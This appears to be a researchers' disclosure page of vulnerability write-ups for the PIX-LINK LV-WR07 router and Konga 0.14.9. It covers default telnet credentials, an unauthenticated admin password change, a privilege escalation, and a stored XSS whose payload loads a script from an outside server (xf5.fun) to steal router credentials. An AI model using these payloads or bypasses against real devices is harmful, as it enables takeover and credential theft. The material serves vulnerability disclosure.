Weak Remote Telnet Access at PIX-LINK LV-WR07 ("CVE requested")

 

Report Vulnerability

Product: PIX-LINK
Model: LV-WR07
Vulnerability: Weak Remote Telnet Access
Impact: This allows an attacker to gain root access to the device over the local network.
Author: Red Team ~ Fabrício Oliveira (xf5), Miguel Alves (@0xmupa), Sérgio Charruadas;

PoC

The router has a weak connection with the telnet protocol. Using the password "admin:admin" allows connection to a remote router like an administrator.

There are command examples to down the router through SPI write memory.

Account Takeover Admin Account at PIX-LINK LV-WR07 ("CVE requested")

Report Vulnerability

Product: PIX-LINK
Model: LV-WR07
Vulnerability: Account Takeover - Admin Account
Impact: Account Takeover in the Admin Account.
Author: Red Team ~ Fabrício Oliveira (xf5), Miguel Alves (@0xmupa), Sérgio Charruadas;

PoC

The router has a single account configured as 'admin', making it easier to change the password with an account takeover attack. The vulnerability is observed below by removing the attribute Cookie: Authorization=Basic, which, when removed, still allows the request to be made (beck-end doesn't validate the permission request) allowing to change the Administrator password.

Through this, we can change the Admin password without needing to be authenticated in the session. With this issue, it's allowed to set a new password through the GET Request at var "SET1" resulting in the account takeover.

After this, was crafted an exploit to change Administrador's password.

In the exploit above, there are observed that don't have a 'Cookie: Authorization', and the var 'SET1' receives an input user (the new password value).

In the picture below we look at the usage exploit. The user need only insert the router IP/DNS and the New Password.

As seen below, the exploit has been executed, changing the password to "cwo123".

Follow the video with FULL PoC.

KONGA 0.14.9 - Privilege Escalation (Exploit) ("Won CVE-2021-42192!")

Report Vulnerability

Product: KONGA 
Model:  0.14.9 
Vulnerability: Privilege Escalation
Impact: Full admin access (vertical privilege escalation)

Authentication: required 

Exploit Author: Fabricio Salomao (@_SOl0m0n) / Paulo Trindade (@paulotrindadec)

PoC

Bellow has created a normal user called "usernormal" without privilege.

Through of request bellow was changed the flag "FALSE" in the parameter "admin" to "TRUE".

Therefore was created an exploit for us : https://www.exploit-db.com/exploits/50521

After running the exploit, the privilege escalation was a success!

Result:

Stored Cross-site scripting (XSS) at PIX-LINK LV-WR07 ("Won CVE-2020-24104!")

Report Vulnerability

Product: PIX-LINK
Model: LV-WR07
Vulnerability: Stored Cross-site scripting (XSS)
Impact: Stolen credentials router and inject malicious JavaScript

PoC

In the "BASIC SETTINGS" option in Router Panel has an input ESSID. This flag able to inject JavaScript.

Bellow the request:

GET /wireless.htm?CMD=WL_BASIC&GO=wireless.htm&SET0=82247936=1&SET1=70451456=9&SET2=71041536=PAYLOAD_XSS&SET3=70713600=3&SET4=67567872=0&SET5=76743168=0;0;0;0&SET6=70648064=1&SET7=71762176=1&SET8=71368960=1&SET9=82051328=1&SET10=81002752=0&SET11=76939776=OPEN;OPEN;OPEN;OPEN&SET12=71893504=NONE;NONE;NONE;NONE&SET13=77201920=12345678&SET14=70910464=1;1;1;1&SET15=76546304=1&SET16=76611840=1&SET17=75956480=1&SET18=76677632=scaptest&SET19=70582784=0;0;0;0&SET20=68288768=100&rd=0.09415532139725702&_=1595340582749 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/wireless.htm
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: Authorization=Basic YWRtaW46SGFja0FsbA==

Inject a simples XSS Payload: <script>alert('xss')</script>

With information bellow in the "pass.htm" and "index.htm" could be stolen.




Now we create a server with a script that stolen sensitive data at Router.
Http://xf5.fun/a.php

I create a simples script, but you can create a complex script with the information above.


Obs: SSID has the ability to store able 32 characters, so need to create a short payload.

<script scr=//xf5.fun></script>

Result:

You can use redirect malicious, a stolen cookie with base 64 credentials, just use imagination.